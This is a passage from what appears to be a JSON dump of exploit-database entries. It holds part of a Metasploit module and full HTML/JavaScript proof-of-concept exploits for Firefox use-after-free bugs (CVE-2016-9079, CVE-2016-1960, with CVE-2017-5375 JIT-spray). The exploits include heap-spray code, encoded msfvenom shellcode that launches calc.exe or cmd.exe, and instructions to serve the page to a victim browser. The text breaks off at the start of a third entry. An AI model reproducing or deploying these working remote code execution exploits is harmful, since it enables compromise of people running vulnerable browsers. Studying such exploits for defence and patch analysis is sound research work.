\"Firefox nsSMILTimeContainer::NotifyTimeChange() RCE\",\r\n 'Description' => %q{\r\n This module exploits an out-of-bounds indexing/use-after-free condition present in\r\n nsSMILTimeContainer::NotifyTimeChange() across numerous versions of Mozilla Firefox\r\n on Microsoft Windows.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Anonymous Gaijin', # Original research/exploit\r\n 'William Webb <william_webb[at]rapid7.com>' # Metasploit module\r\n ],\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Mozilla Firefox',\r\n {\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X86,\r\n }\r\n ],\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => \"thread\",\r\n 'InitialAutoRunScript' => 'migrate -f'\r\n },\r\n 'References' =>\r\n [\r\n [ 'CVE', '2016-9079' ],\r\n [ 'Bugzilla', '1321066' ]\r\n ],\r\n 'Arch' => ARCH_X86,\r\n 'DisclosureDate' => \"Nov 30 2016\",\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptBool.new('UsePostHTML', [ true, 'Rewrite page with arbitrary HTML after successful exploitation. NOTE: if set to true, you should probably rewrite data/exploits/ff_smil_uaf/post.html to something useful!', false ]),\r\n ], self.class\r\n )\r\n end\r\n\r\n def exploit_html(cli)\r\n p = payload.encoded\r\n arch = Rex::Arch.endian(target.arch)\r\n payload_final = Rex::Text.to_unescape(p, arch, prefix='\\\\u')\r\n base_uri = \"#{get_resource.chomp('/')}\"\r\n\r\n # stuff that gets adjusted alot during testing\r\n\r\n defrag_x = %Q~\r\n for (var i = 0; i < 0x4000; i++)\r\n heap80[i] = block80.slice(0)\r\n ~\r\n defrag_y = %Q~\r\n for (var i = 0x4401; i < heap80.length; i++)\r\n heap80[i] = block80.slice(0)\r\n ~\r\n\r\n js = %Q~\r\n var worker = new Worker('#{base_uri}/worker.js');\r\n var svgns = 'http://www.w3.org/2000/svg';\r\n var heap80 = new Array(0x5000);\r\n var heap100 = new Array(0x5000);\r\n var block80 = new ArrayBuffer(0x80);\r\n var block100 = new ArrayBuffer(0x100);\r\n var sprayBase = undefined;\r\n var arrBase = undefined;\r\n\r\n var animateX = undefined;\r\n var containerA = undefined;\r\n\r\n var milestone_offset = 0x90;\r\n\r\n var $ = function(id) { return document.getElementById(id); }\r\n\r\n var heap = function()\r\n {\r\n var u32 = new Uint32Array(block80)\r\n\r\n u32[4] = arrBase - milestone_offset;\r\n\r\n u32[0xa] = arrBase + 0x1000 - milestone_offset;\r\n\r\n u32[0x10] = arrBase + 0x2000 - milestone_offset;\r\n\r\n var x = document.createElementNS(svgns, 'animate')\r\n var svg = document.createElementNS(svgns, 'svg')\r\n\r\n svg.appendChild(x)\r\n svg.appendChild(x.cloneNode(true))\r\n\r\n for (var i = 0; i < 0x400; i++)\r\n {\r\n var node = svg.cloneNode(true);\r\n node.setAttribute('id', 'svg' + i)\r\n document.body.appendChild(node);\r\n }\r\n #{defrag_x}\r\n\r\n for (var i = 0; i < 0x400; i++)\r\n {\r\n heap80[i + 0x3000] = block80.slice(0)\r\n $('svg' + i).appendChild(x.cloneNode(true))\r\n }\r\n\r\n for (var i = 0; i < 0x400; i++)\r\n {\r\n $('svg' + i).appendChild(x.cloneNode(true))\r\n $('svg' + i).appendChild(x.cloneNode(true))\r\n }\r\n\r\n for (var i = 0; i < heap100.length; i++)\r\n heap100[i] = block100.slice(0)\r\n\r\n #{defrag_y}\r\n\r\n for (var i = 0x100; i < 0x400; i++)\r\n $('svg' + i).appendChild(x.cloneNode(true))\r\n }\r\n\r\n var exploit = function()\r\n {\r\n heap();\r\n\r\n animateX.setAttribute('begin', '59s')\r\n animateX.setAttribute('begin', '58s')\r\n animateX.setAttribute('begin', '10s')\r\n animateX.setAttribute('begin', '9s')\r\n\r\n // money shot\r\n\r\n containerA.pauseAnimations();\r\n }\r\n\r\n worker.onmessage = function(e)\r\n {\r\n worker.onmessage = function(e)\r\n {\r\n window.setTimeout(function()\r\n {\r\n worker.terminate();\r\n document.body.innerHTML = '';\r\n document.getElementsByTagName('head')[0].innerHTML = '';\r\n document.body.setAttribute('onload', '')\r\n document.write('<blink>')\r\n }, 1000);\r\n }\r\n\r\n arrBase = e.data;\r\n exploit();\r\n }\r\n\r\n\r\n var idGenerator = function()\r\n {\r\n return 'id' + (((1+Math.random())*0x10000)|0).toString(16).substring(1);\r\n }\r\n\r\n\r\n var craftDOM = function()\r\n {\r\n containerA = document.createElementNS(svgns, 'svg')\r\n var containerB = document.createElementNS(svgns, 'svg');\r\n\r\n animateX = document.createElementNS(svgns, 'animate')\r\n var animateA = document.createElementNS(svgns, 'animate')\r\n var animateB = document.createElementNS(svgns, 'animate')\r\n\r\n var animateC = document.createElementNS(svgns, 'animate')\r\n\r\n var idX = idGenerator();\r\n var idA = idGenerator();\r\n var idB = idGenerator();\r\n var idC = idGenerator();\r\n\r\n animateX.setAttribute('id', idX);\r\n animateA.setAttribute('id', idA);\r\n animateA.setAttribute('end', '50s');\r\n animateB.setAttribute('id', idB);\r\n animateB.setAttribute('begin', '60s');\r\n animateB.setAttribute('end', idC + '.end');\r\n animateC.setAttribute('id', idC);\r\n animateC.setAttribute('begin', '10s');\r\n animateC.setAttribute('end', idA + '.end');\r\n\r\n containerA.appendChild(animateX)\r\n containerA.appendChild(animateA)\r\n containerA.appendChild(animateB)\r\n\r\n containerB.appendChild(animateC)\r\n\r\n document.body.appendChild(containerA);\r\n document.body.appendChild(containerB);\r\n }\r\n window.onload = craftDOM;\r\n ~\r\n\r\n # If you want to change the appearance of the landing page, do it here\r\n\r\n html = %Q~\r\n <html>\r\n <head>\r\n <meta charset=\"utf-8\"/>\r\n <script>\r\n #{js}\r\n </script>\r\n </head>\r\n <body>\r\n </body>\r\n </html>\r\n ~\r\n\r\n if datastore['UsePostHTML']\r\n f = File.open(File.join(Msf::Config.data_directory, \"exploits\", \"firefox_smil_uaf\", \"post.html\"), \"rb\")\r\n c = f.read\r\n html = html.gsub(\"<blink>\", c)\r\n else\r\n html = html.gsub(\"<blink>\", \"\")\r\n end\r\n send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })\r\n end\r\n\r\n def worker_js(cli)\r\n p = payload.encoded\r\n arch = Rex::Arch.endian(target.arch)\r\n payload = Rex::Text.to_unescape(p, arch)\r\n wt = File.open(File.join(Msf::Config.data_directory, \"exploits\", \"firefox_smil_uaf\", \"worker.js\"), \"rb\")\r\n c = wt.read\r\n c = c.gsub(\"INSERTSHELLCODEHEREPLZ\", payload)\r\n c = c.gsub(\"NOPSGOHERE\", \"\\u9090\")\r\n send_response(cli, c, { 'Content-Type' => 'application/javascript', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })\r\n end\r\n\r\n def is_ff_on_windows(user_agent)\r\n target_hash = fingerprint_user_agent(user_agent)\r\n if target_hash[:ua_name] !~ /Firefox/ or target_hash[:os_name] !~ /Windows/\r\n return false\r\n end\r\n return true\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n print_status(\"Got request: #{request.uri}\")\r\n print_status(\"From: #{request.headers['User-Agent']}\")\r\n if (!is_ff_on_windows(request.headers['User-Agent']))\r\n print_error(\"Unsupported user agent: #{request.headers['User-Agent']}\")\r\n send_not_found(cli)\r\n close_client(cli)\r\n return\r\n end\r\n if request.uri =~ /worker\\.js/\r\n print_status(\"Sending worker thread Javascript ...\")\r\n worker_js(cli)\r\n return\r\n end\r\n if request.uri =~ /index\\.html/ or request.uri =~ /\\//\r\n\r\n print_status(\"Sending exploit HTML ...\")\r\n exploit_html(cli)\r\n close_client(cli)\r\n return\r\n end\r\n end\r\nend\n\n# 0day.today [2018-04-12] #", "sourceHref": "https://0day.today/exploit/26792", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-03-19T02:11:48", "description": "Exploit for windows platform in category remote exploits", "cvss3": {}, "published": "2018-03-17T00:00:00", "type": "zdt", "title": "Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-9079", "CVE-2017-5375"], "modified": "2018-03-17T00:00:00", "id": "1337DAY-ID-30001", "href": "https://0day.today/exploit/description/30001", "sourceData": "<!DOCTYPE HTML>\r\n \r\n<!--\r\n \r\n FULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375)\r\n *PoC* Exploit against Firefox 44.0.2 (CVE-2016-1960)\r\n ASM.JS float constant pool JIT-Spray special shown at OffensiveCon 2018\r\n \r\n Tested on:\r\n Firefox 44.0.2 32-bit - Windows 10 1709\r\n https://ftp.mozilla.org/pub/firefox/releases/44.0.2/win32/en-US/Firefox%20Setup%2044.0.2.exe\r\n \r\n Howto:\r\n 1) serve PoC over network and open it in Firefox 44.0.2 32-bit\r\n 2) A successfull exploit attempt should pop calc.exe\r\n \r\n Mozilla Bug Report:\r\n https://bugzilla.mozilla.org/show_bug.cgi?id=1246014\r\n \r\n \r\n Writeup: \r\n https://rh0dev.github.io/blog/2018/more-on-asm-dot-js-payloads-and-exploitation/\r\n \r\n \r\n - For research purposes only -\r\n \r\n (C) Rh0\r\n \r\n Mar. 13, 2018\r\n \r\n Notes:\r\n *) very similar to CVE-2016-2819, but still different:\r\n *) this PoC (CVE-2016-1960) does trigger in 44.0.2 but not in 46.0.1\r\n because in 46.0.1 it is already fixed.\r\n *) CVE-2016-2819 does trigger the same bug in 44.0.2 and 46.0.1 because it\r\n was fixed in Firefox > 46.0.1\r\n \r\n-->\r\n \r\n<title>CVE-2016-1960 and ASM.JS JIT-Spray</title>\r\n<head>\r\n<meta charset=UTF-8 />\r\n<script>\r\n\"use strict\"\r\n \r\nvar Exploit = function(){\r\n this.asmjs = new Asmjs()\r\n this.heap = new Heap()\r\n}\r\n \r\nExploit.prototype.go = function(){\r\n /* target address of fake node object */\r\n var node_target_addr = 0x20200000 \r\n \r\n /* target address of asm.js float pool payload*/\r\n var target_eip = 0x3c3c1dc8\r\n \r\n /* spray fake Node objects */\r\n this.heap.spray(node_target_addr, target_eip)\r\n \r\n /* spray asm.js float constant pools */\r\n this.asmjs.spray_float_payload(0x1800)\r\n \r\n /* go! */\r\n this.trigger_vuln(node_target_addr)\r\n};\r\n \r\n \r\nExploit.prototype.trigger_vuln = function(node_ptr){\r\n document.body.innerHTML = '<table><svg><div id=\"AAAA\">'\r\n this.heap.gc()\r\n var a = new Array() \r\n for (var i=0; i < 0x11000; i++){\r\n /* array element (Node object ptr) control with integer underflow */\r\n a[i] = new Uint32Array(0x100/4)\r\n for (var j=0; j<0x100/4; j++)\r\n a[i][j] = node_ptr \r\n }\r\n \r\n /* original crashing testcase\r\n document.getElementById('AAAA').innerHTML = '<title><template><td><tr><title><i></tr><style>td</style>';\r\n */\r\n \r\n /* easier to exploit codepath */\r\n document.getElementById('AAAA').innerHTML = '<title><template><td><tr><title><i></tr><style>td<DD>';\r\n \r\n window.location.reload()\r\n};\r\n \r\n \r\nvar Asmjs = function(){};\r\n \r\nAsmjs.prototype.asm_js_module = function(stdlib, ffi){\r\n \"use asm\"\r\n var foo = ffi.foo\r\n function payload(){\r\n var val = 0.0\r\n /* Fx 44.0.2 float constant pool of size 0xc0 is at 0xXXXX1dc8*/\r\n val = +foo(\r\n // $ msfvenom --payload windows/exec CMD=calc.exe # transformed with sc2asmjs.py\r\n -1.587865768352248e-263,\r\n -8.692422460804815e-255,\r\n 7.529882109376901e-114,\r\n 2.0120602207293977e-16,\r\n 3.7204662687249914e-242,\r\n 4.351158092040946e+89,\r\n 2.284741716118451e+270,\r\n 7.620699014501263e-153,\r\n 5.996021286047645e+44,\r\n -5.981935902612295e-92,\r\n 6.23540918304361e+259,\r\n 1.9227873281657598e+256,\r\n 2.0672493951546363e+187,\r\n -6.971032919585734e+91,\r\n 5.651413300798281e-134,\r\n -1.9040061366251406e+305,\r\n -1.2687640718807038e-241,\r\n 9.697849844423e-310,\r\n -2.0571400761625145e+306,\r\n -1.1777948610587587e-123,\r\n 2.708909852013898e+289,\r\n 3.591750823735296e+37,\r\n -1.7960516725035723e+106,\r\n 6.326776523166028e+180\r\n )\r\n return +val;\r\n }\r\n return payload\r\n};\r\n \r\nAsmjs.prototype.spray_float_payload = function(regions){\r\n this.modules = new Array(regions).fill(null).map(\r\n region => this.asm_js_module(window, {foo: () => 0})\r\n )\r\n};\r\n \r\nvar Heap = function(target_addr, eip){\r\n this.node_heap = []\r\n};\r\n \r\n \r\nHeap.prototype.spray = function(node_target_addr, target_eip){\r\n var junk = 0x13371337\r\n var current_address = 0x08000000\r\n var block_size = 0x1000000\r\n while(current_address < node_target_addr){\r\n var fake_objects = new Uint32Array(block_size/4 - 0x100)\r\n for (var offset = 0; offset < block_size; offset += 0x100000){\r\n /* target Node object needed to control EIP */\r\n fake_objects[offset/4 + 0x00/4] = 0x29 \r\n fake_objects[offset/4 + 0x0c/4] = 3\r\n fake_objects[offset/4 + 0x14/4] = node_target_addr + 0x18\r\n fake_objects[offset/4 + 0x18/4] = 1\r\n fake_objects[offset/4 + 0x1c/4] = junk\r\n fake_objects[offset/4 + 0x20/4] = node_target_addr + 0x24\r\n fake_objects[offset/4 + 0x24/4] = node_target_addr + 0x28\r\n fake_objects[offset/4 + 0x28/4] = node_target_addr + 0x2c\r\n fake_objects[offset/4 + 0x2c/4] = target_eip \r\n }\r\n this.node_heap.push(fake_objects)\r\n current_address += block_size\r\n }\r\n};\r\n \r\nHeap.prototype.gc = function(){\r\n for (var i=0; i<=10; i++)\r\n var x = new ArrayBuffer(0x1000000)\r\n};\r\n \r\n</script>\r\n<head>\r\n<body onload='exploit = new Exploit(); exploit.go()' />\n\n# 0day.today [2018-03-19] #", "sourceHref": "https://0day.today/exploit/30001", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-07T23:48:22", "description": "Exploit for windows platform in category remote exploits", "cvss3": {}, "published": "2017-07-15T00:00:00", "type": "zdt", "title": "Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-9079", "CVE-2017-5375"], "modified": "2017-07-15T00:00:00", "id": "1337DAY-ID-28138", "href": "https://0day.today/exploit/description/28138", "sourceData": "<!DOCTYPE HTML>\r\n \r\n<!--\r\n \r\n FULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375)\r\n PoC Exploit against Firefox 50.0.1 (CVE-2016-9079 - Tor Browser 0day)\r\n \r\n Tested on:\r\n \r\n Release 50.0.1 32-bit - Windows 8.1 / Windows 10\r\n https://ftp.mozilla.org/pub/firefox/releases/50.0.1/win32/en-US/Firefox%20Setup%2050.0.1.exe\r\n \r\n Howto:\r\n \r\n 1) serve PoC over network and open it in Firefox 50.0.1 32-bit\r\n 2) if you don't see cmd.exe, open processexplorer and verify that cmd.exe was spawned by firefox.exe\r\n \r\n A successfull exploit attempt should pop cmd.exe\r\n \r\n Writeup: https://rh0dev.github.io/blog/2017/the-return-of-the-jit/\r\n \r\n (C) Rh0\r\n \r\n Jul. 13, 2017\r\n \r\n-->\r\n \r\n<script async>\r\nfunction asm_js_module(){\r\n \"use asm\";\r\n /* huge jitted nop sled */\r\n function payload_code(){\r\n var val = 0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n /* 3 byte VirtualAlloc RWX stager */\r\n val = (val + 0xa890db31)|0;\r\n val = (val + 0xa89030b3)|0;\r\n val = (val + 0xa81b8b64)|0;\r\n val = (val + 0xa80c5b8b)|0;\r\n val = (val + 0xa81c5b8b)|0;\r\n val = (val + 0xa8b9006a)|0;\r\n val = (val + 0xa8904c4c)|0;\r\n val = (val + 0xa8902eb1)|0;\r\n val = (val + 0xa85144b5)|0;\r\n val = (val + 0xa8b99090)|0;\r\n val = (val + 0xa8903233)|0;\r\n val = (val + 0xa89045b1)|0;\r\n val = (val + 0xa8514cb5)|0;\r\n val = (val + 0xa8b99090)|0;\r\n val = (val + 0xa8904e52)|0;\r\n val = (val + 0xa8904bb1)|0;\r\n val = (val + 0xa85145b5)|0;\r\n val = (val + 0xa8590e6a)|0;\r\n val = (val + 0xa84fe789)|0;\r\n val = (val + 0xa8086b8b)|0;\r\n val = (val + 0xa820738b)|0;\r\n val = (val + 0xa8471b8b)|0;\r\n val = (val + 0xa82ae349)|0;\r\n val = (val + 0xa890c031)|0;\r\n val = (val + 0xa890ad66)|0;\r\n val = (val + 0xa89c613c)|0;\r\n val = (val + 0xa8077c9d)|0;\r\n val = (val + 0xa890202c)|0;\r\n val = (val + 0xa89c073a)|0;\r\n val = (val + 0xa8d7749d)|0;\r\n val = (val + 0xa890bdeb)|0;\r\n val = (val + 0xa8b9006a)|0;\r\n val = (val + 0xa890636f)|0;\r\n val = (val + 0xa8906cb1)|0;\r\n val = (val + 0xa8516cb5)|0;\r\n val = (val + 0xa8b99090)|0;\r\n val = (val + 0xa890416c)|0;\r\n val = (val + 0xa89075b1)|0;\r\n val = (val + 0xa85161b5)|0;\r\n val = (val + 0xa8b99090)|0;\r\n val = (val + 0xa8907472)|0;\r\n val = (val + 0xa89056b1)|0;\r\n val = (val + 0xa85169b5)|0;\r\n val = (val + 0xa890eb89)|0;\r\n val = (val + 0xa83cc583)|0;\r\n val = (val + 0xa8006d8b)|0;\r\n val = (val + 0xa890dd01)|0;\r\n val = (val + 0xa878c583)|0;\r\n val = (val + 0xa8006d8b)|0;\r\n val = (val + 0xa890dd01)|0;\r\n val = (val + 0xa820458b)|0;\r\n val = (val + 0xa890d801)|0;\r\n val = (val + 0xa890d231)|0;\r\n val = (val + 0xa890e789)|0;\r\n val = (val + 0xa8590d6a)|0;\r\n val = (val + 0xa810348b)|0;\r\n val = (val + 0xa890de01)|0;\r\n val = (val + 0xa890a6f3)|0;\r\n val = (val + 0xa8900de3)|0;\r\n val = (val + 0xa804c283)|0;\r\n val = (val + 0xa890dbeb)|0;\r\n val = (val + 0xa8247d8b)|0;\r\n val = (val + 0xa890df01)|0;\r\n val = (val + 0xa890ead1)|0;\r\n val = (val + 0xa890d701)|0;\r\n val = (val + 0xa890d231)|0;\r\n val = (val + 0xa8178b66)|0;\r\n val = (val + 0xa81c7d8b)|0;\r\n val = (val + 0xa890df01)|0;\r\n val = (val + 0xa802e2c1)|0;\r\n val = (val + 0xa890d701)|0;\r\n val = (val + 0xa8903f8b)|0;\r\n val = (val + 0xa890df01)|0;\r\n val = (val + 0xa890406a)|0;\r\n val = (val + 0xa890c031)|0;\r\n val = (val + 0xa85030b4)|0;\r\n val = (val + 0xa85010b4)|0;\r\n val = (val + 0xa890006a)|0;\r\n val = (val + 0xa890d7ff)|0;\r\n val = (val + 0xa890c931)|0;\r\n val = (val + 0xa89000b5)|0;\r\n val = (val + 0xa890c3b1)|0;\r\n val = (val + 0xa890ebd9)|0;\r\n val = (val + 0xa82434d9)|0;\r\n val = (val + 0xa890e689)|0;\r\n val = (val + 0xa80cc683)|0;\r\n val = (val + 0xa890368b)|0;\r\n val = (val + 0xa85fc683)|0;\r\n val = (val + 0xa890c789)|0;\r\n val = (val + 0xa81e8b66)|0;\r\n val = (val + 0xa81f8966)|0;\r\n val = (val + 0xa802c683)|0;\r\n val = (val + 0xa802c783)|0;\r\n val = (val + 0xa8901e8a)|0;\r\n val = (val + 0xa8901f88)|0;\r\n val = (val + 0xa803c683)|0;\r\n val = (val + 0xa801c783)|0;\r\n val = (val + 0xa803e983)|0;\r\n val = (val + 0xa89008e3)|0;\r\n val = (val + 0xa890cceb)|0;\r\n val = (val + 0xa890e0ff)|0;\r\n val = (val + 0xa824248d)|0;\r\n /* $ msfvenom --payload windows/exec CMD=cmd.exe EXITFUNC=seh */\r\n val = (val + 0xa882e8fc)|0;\r\n val = (val + 0xa8000000)|0;\r\n val = (val + 0xa8e58960)|0;\r\n val = (val + 0xa864c031)|0;\r\n val = (val + 0xa830508b)|0;\r\n val = (val + 0xa80c528b)|0;\r\n val = (val + 0xa814528b)|0;\r\n val = (val + 0xa828728b)|0;\r\n val = (val + 0xa84ab70f)|0;\r\n val = (val + 0xa8ff3126)|0;\r\n val = (val + 0xa8613cac)|0;\r\n val = (val + 0xa82c027c)|0;\r\n val = (val + 0xa8cfc120)|0;\r\n val = (val + 0xa8c7010d)|0;\r\n val = (val + 0xa852f2e2)|0;\r\n val = (val + 0xa8528b57)|0;\r\n val = (val + 0xa84a8b10)|0;\r\n val = (val + 0xa84c8b3c)|0;\r\n val = (val + 0xa8e37811)|0;\r\n val = (val + 0xa8d10148)|0;\r\n val = (val + 0xa8598b51)|0;\r\n val = (val + 0xa8d30120)|0;\r\n val = (val + 0xa818498b)|0;\r\n val = (val + 0xa8493ae3)|0;\r\n val = (val + 0xa88b348b)|0;\r\n val = (val + 0xa831d601)|0;\r\n val = (val + 0xa8c1acff)|0;\r\n val = (val + 0xa8010dcf)|0;\r\n val = (val + 0xa8e038c7)|0;\r\n val = (val + 0xa803f675)|0;\r\n val = (val + 0xa83bf87d)|0;\r\n val = (val + 0xa875247d)|0;\r\n val = (val + 0xa88b58e4)|0;\r\n val = (val + 0xa8012458)|0;\r\n val = (val + 0xa88b66d3)|0;\r\n val = (val + 0xa88b4b0c)|0;\r\n val = (val + 0xa8011c58)|0;\r\n val = (val + 0xa8048bd3)|0;\r\n val = (val + 0xa8d0018b)|0;\r\n val = (val + 0xa8244489)|0;\r\n val = (val + 0xa85b5b24)|0;\r\n val = (val + 0xa85a5961)|0;\r\n val = (val + 0xa8e0ff51)|0;\r\n val = (val + 0xa85a5f5f)|0;\r\n val = (val + 0xa8eb128b)|0;\r\n val = (val + 0xa86a5d8d)|0;\r\n val = (val + 0xa8858d01)|0;\r\n val = (val + 0xa80000b2)|0;\r\n val = (val + 0xa8685000)|0;\r\n val = (val + 0xa86f8b31)|0;\r\n val = (val + 0xa8d5ff87)|0;\r\n val = (val + 0xa80efebb)|0;\r\n val = (val + 0xa868ea32)|0;\r\n val = (val + 0xa8bd95a6)|0;\r\n val = (val + 0xa8d5ff9d)|0;\r\n val = (val + 0xa87c063c)|0;\r\n val = (val + 0xa8fb800a)|0;\r\n val = (val + 0xa80575e0)|0;\r\n val = (val + 0xa81347bb)|0;\r\n val = (val + 0xa86a6f72)|0;\r\n val = (val + 0xa8ff5300)|0;\r\n val = (val + 0xa86d63d5)|0;\r\n val = (val + 0xa8652e64)|0;\r\n val = (val + 0xa8006578)|0;\r\n val = (val + 0xa8909090)|0;\r\n \r\n return val|0;\r\n }\r\n return payload_code \r\n}\r\n</script>\r\n \r\n<script>\r\nfunction spray_asm_js_modules(){\r\n sprayed = []\r\n for (var i=0; i<= 0x1800; i++){\r\n sprayed[i] = asm_js_module()\r\n }\r\n}\r\n \r\n/* heap spray inspired by skylined */\r\nfunction heap_spray_fake_objects(){\r\n var heap = []\r\n var current_address = 0x08000000\r\n var block_size = 0x1000000\r\n while(current_address < object_target_address){\r\n var heap_block = new Uint32Array(block_size/4 - 0x100)\r\n for (var offset = 0; offset < block_size; offset += 0x100000){\r\n \r\n /* fake object target = ecx + 0x88 and fake vtable*/\r\n heap_block[offset/4 + 0x00/4] = object_target_address\r\n /* self + 4 */\r\n heap_block[offset/4 + 0x14/4] = object_target_address\r\n /* the path to EIP */\r\n heap_block[offset/4 + 0x18/4] = 4\r\n heap_block[offset/4 + 0xac/4] = 1\r\n /* fake virtual function --> JIT target */\r\n heap_block[offset/4 + 0x138/4] = jit_payload_target \r\n }\r\n heap.push(heap_block)\r\n current_address += block_size\r\n }\r\n return heap\r\n}\r\n \r\n/* address of fake object */\r\nobject_target_address = 0x30300000\r\n \r\n/* address of our jitted shellcode */\r\njit_payload_target = 0x1c1c0054\r\n \r\n/* ASM.JS JIT Spray */\r\nspray_asm_js_modules()\r\n \r\n/* Spray fake objects */\r\nheap = heap_spray_fake_objects()\r\n \r\n/* -----> */\r\n/* bug trigger ripped from bugzilla report */\r\nvar worker = new Worker('data:javascript,self.onmessage=function(msg){postMessage(\"one\");postMessage(\"two\");};');\r\nworker.postMessage(\"zero\");\r\nvar svgns = 'http://www.w3.org/2000/svg';\r\nvar heap80 = new Array(0x1000);\r\nvar heap100 = new Array(0x4000);\r\nvar block80 = new ArrayBuffer(0x80);\r\nvar block100 = new ArrayBuffer(0x100);\r\nvar sprayBase = undefined;\r\nvar arrBase = undefined;\r\nvar animateX = undefined;\r\nvar containerA = undefined;\r\nvar offset = 0x88 // Firefox 50.0.1\r\n \r\nvar exploit = function(){\r\n var u32 = new Uint32Array(block80)\r\n \r\n u32[0x4] = arrBase - offset;\r\n u32[0xa] = arrBase - offset;\r\n u32[0x10] = arrBase - offset;\r\n \r\n for(i = heap100.length/2; i < heap100.length; i++)\r\n {\r\n heap100[i] = block100.slice(0)\r\n }\r\n \r\n for(i = 0; i < heap80.length/2; i++)\r\n {\r\n heap80[i] = block80.slice(0)\r\n }\r\n \r\n animateX.setAttribute('begin', '59s')\r\n animateX.setAttribute('begin', '58s')\r\n \r\n for(i = heap80.length/2; i < heap80.length; i++)\r\n {\r\n heap80[i] = block80.slice(0)\r\n }\r\n \r\n for(i = heap100.length/2; i < heap100.length; i++)\r\n {\r\n heap100[i] = block100.slice(0)\r\n }\r\n \r\n animateX.setAttribute('begin', '10s')\r\n animateX.setAttribute('begin', '9s')\r\n containerA.pauseAnimations();\r\n}\r\n \r\nworker.onmessage = function(e) {arrBase=object_target_address; exploit()}\r\n//worker.onmessage = function(e) {arrBase=0x30300000; exploit()}\r\n \r\nvar trigger = function(){\r\n containerA = document.createElementNS(svgns, 'svg')\r\n var containerB = document.createElementNS(svgns, 'svg');\r\n animateX = document.createElementNS(svgns, 'animate')\r\n var animateA = document.createElementNS(svgns, 'animate')\r\n var animateB = document.createElementNS(svgns, 'animate')\r\n var animateC = document.createElementNS(svgns, 'animate')\r\n var idA = \"ia\";\r\n var idC = \"ic\";\r\n animateA.setAttribute('id', idA);\r\n animateA.setAttribute('end', '50s');\r\n animateB.setAttribute('begin', '60s');\r\n animateB.setAttribute('end', idC + '.end');\r\n animateC.setAttribute('id', idC);\r\n animateC.setAttribute('end', idA + '.end');\r\n containerA.appendChild(animateX)\r\n containerA.appendChild(animateA)\r\n containerA.appendChild(animateB)\r\n containerB.appendChild(animateC)\r\n document.body.appendChild(containerA);\r\n document.body.appendChild(containerB);\r\n}\r\n \r\nwindow.onload = trigger;\r\nsetInterval(\"window.location.reload()\", 3000)\r\n/* <----- */\r\n \r\n</script>\n\n# 0day.today [2018-04-07] #", "sourceHref": "https://0day.today/exploit/28138", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-01T21:32:12", "description": "Exploit for windows platform in category remote exploits", "cvss3": {}, "published": "2018-03-17T00:00:00", "type": "zdt", "title": "Firefox 46.0.1 - ASM.JS JIT-Spray Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-9079", "CVE-2017-5375"], "modified": "2018-03-17T00:00:00", "id": "1337DAY-ID-30002", "href": "https://0day.today/exploit/description/30002", "sourceData": "<!DOCTYPE HTML>\r\n \r\n<!--\r\n \r\n FULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375)\r\n *PoC* Exploit against Firefox 46.0.1 (CVE-2016-2819)\r\n ASM.JS float constant pool JIT-Spray special shown at OffensiveCon 2018\r\n \r\n Tested on:\r\n Firefox 46.0.1 32-bit - Windows 10 1709\r\n https://ftp.mozilla.org/pub/firefox/releases/46.0.1/win32/en-US/Firefox%20Setup%2046.0.1.exe\r\n \r\n Howto:\r\n 1) serve PoC over network and open it in Firefox 46.0.1 32-bit\r\n 2) A successfull exploit attempt should pop calc.exe\r\n \r\n Mozilla Bug Report:\r\n https://bugzilla.mozilla.org/show_bug.cgi?id=1270381\r\n \r\n \r\n Writeup: \r\n https://rh0dev.github.io/blog/2018/more-on-asm-dot-js-payloads-and-exploitation/\r\n \r\n \r\n - For research purposes only -\r\n \r\n (C) Rh0\r\n 